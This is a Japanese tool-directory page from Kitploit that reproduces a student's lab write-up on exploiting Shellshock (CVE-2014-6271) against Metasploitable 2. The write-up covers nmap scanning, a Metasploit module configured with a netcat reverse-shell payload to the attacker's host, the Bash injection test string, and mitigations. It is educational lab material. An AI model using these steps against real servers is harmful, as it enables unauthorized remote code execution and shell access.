Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — 教育用ラボで、Metasploitable 2 を対象に Metasploit を使用した Shellshock(CVE-2014-6271)の悪用を実演します。スキャン、悪用、リバースシェル、および緩和策を含みます。 | Kitploit
ツール/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

教育用ラボで、Metasploitable 2 を対象に Metasploit を使用した Shellshock(CVE-2014-6271)の悪用を実演します。スキャン、悪用、リバースシェル、および緩和策を含みます。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🐚 Shellshock(CVE-2014-6271)– 悪用と分析

📌 概要

これは、脆弱性評価とペネトレーションテスト II の実践課題であり、Shellshock脆弱性(CVE-2014-6271)の悪用と分析に焦点を当てています。
制御されたラボ環境で、Metasploitable 2(ターゲット)とKali Linux(攻撃者)を使用して実施しました。


🛠 使用ツール

  • 💻 Kali Linux – 攻撃マシン
  • 🖥 Metasploitable 2 – 脆弱なターゲット
  • 🔍 Nmap – スキャンとサービス検出
  • 🎯 Metasploit Framework – 悪用

🔍 脆弱性概要

  • タイプ: リモートコード実行(RCE)
  • 影響を受けるコンポーネント: GNU Bash(バージョン1.14–4.3)
  • 影響: 特別に細工された環境変数を介して任意のコマンドを実行
  • CVSSスコア: 10.0(クリティカル)
  • 悪用ベクトル: 多くの場合、HTTPヘッダーを介してCGIスクリプトに

⚡ ラボの手順

1️⃣ ターゲットのスキャン

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ Metasploitの起動 msfconsole

3️⃣ エクスプロイトモジュールのロード use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ エクスプロイトの設定

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ エクスプロイトの実行 exploit

📸 デモ内容

root@kitploit:~
📡 Nmapスキャン結果

⚙️ Metasploitの設定

🔄 リバースシェルセッションの出力

🛠 エクスプロイト後のコマンド:

whoami
uname -a
ifconfig

📖 理論的背景

Shellshockとは?

Shellshockは、GNU Bashシェルの脆弱性であり、攻撃者が環境変数にコマンドを注入することで任意のコマンドを実行できるようにするものです。 2014年9月に発見され、CVE-2014-6271が割り当てられました。Bash v1.14からv4.3に影響します。

動作原理

Bashは環境変数内の関数定義を誤って処理し、関数本体の後に追加のコマンドを実行します。 CGIスクリプトを使用するWebサーバーでは、HTTPヘッダーが環境変数になるため、攻撃経路が容易になります。

例:

env x='() { :;}; echo vulnerable' bash -c "echo test"

脆弱な場合、vulnerableと表示されます。

影響

root@kitploit:~
認証なしの完全なリモートコード実行(RCE)

単純なHTTPリクエストで悪用可能

ボットネット、ワーム、標的型攻撃で使用される

数百万のサーバー、ルーター、IoTデバイスに影響

実際の悪用事例

root@kitploit:~
Yahooサーバー – CGIスクリプト経由のマルウェア

Wopbotボットネット – 自動化された悪用

QNAP NAS – リモートシェルアクセスとマルウェア

自己増殖ワーム – 新たな脆弱なホストへの拡散

🛡 予防と対策

root@kitploit:~
🔄 Bashを直ちに更新する

🚫 未使用のCGIスクリプトを無効にする

🔥 ファイアウォールを使用して不要なトラフィックをブロックする

🛡 Webアプリケーションファイアウォール(WAF)を導入する

📜 HTTPリクエストログを監視する

👤 最小権限の原則を適用する

⚠️ 免責事項

このプロジェクトは教育目的のみです。 すべてのテストは制御されたラボ環境で行われました。 ❌ 許可なくシステムでこれらの技術を使用しないでください。

👨‍💻 作者: Janith Madhusankha 🎓 コース: BICT(優等)ネットワーク&セキュリティ 🏫 所属機関: スリランカ南東大学

ツールをダウンロード